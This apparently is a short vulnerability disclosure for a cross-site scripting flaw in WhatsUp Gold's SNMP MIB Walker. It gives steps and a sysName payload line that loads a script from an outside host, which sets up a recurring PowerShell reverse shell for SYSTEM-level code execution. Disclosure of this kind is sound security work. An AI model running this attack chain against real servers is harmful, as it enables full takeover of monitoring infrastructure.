November 2, 2022, 6:14 pm whatsupgold

Whats Up Gold 2022

< v. 22.1.0


Improper validation of strings from SNMP devices when using the SNMP MIB Walker, makes the application prone to a reflected XXS attack.

Steps To Reproduce:

  1. Place a XSS payload in the SNMPD.conf on a Linux computer. Have the payload open a javascript file hosted on a HTTPS webserver (Because WhatsUpGold uses HTTPS, you cannot link to a HTTP webserver). SNMP walk the Linux computers IP.
  2. Modify script below to run revshell. You can de-base my payload and change IP and port, then base64 encode again and put it in script. Or run another payload of course.
  3. Save the script on a webserver
  4. Add XSS pointing at url of script in SNMPD config, I placed it in sysName:
    sysContact Me <me@example.org>
    sysLocation Home
    sysName LinuxPC<script src='https://f20.be/t.js'/>
  5. Open the SNMP MIB Walker tool and "walk" the IP address of the Linux computer


Function of script

  • It will make an powershell-task, containing reverse shell in this example
  • Trigger the task to run every five minutes


The attacker will have Remote Code Execution as the "NT System" account. Full control of the server.

POC Video

Continue Reading...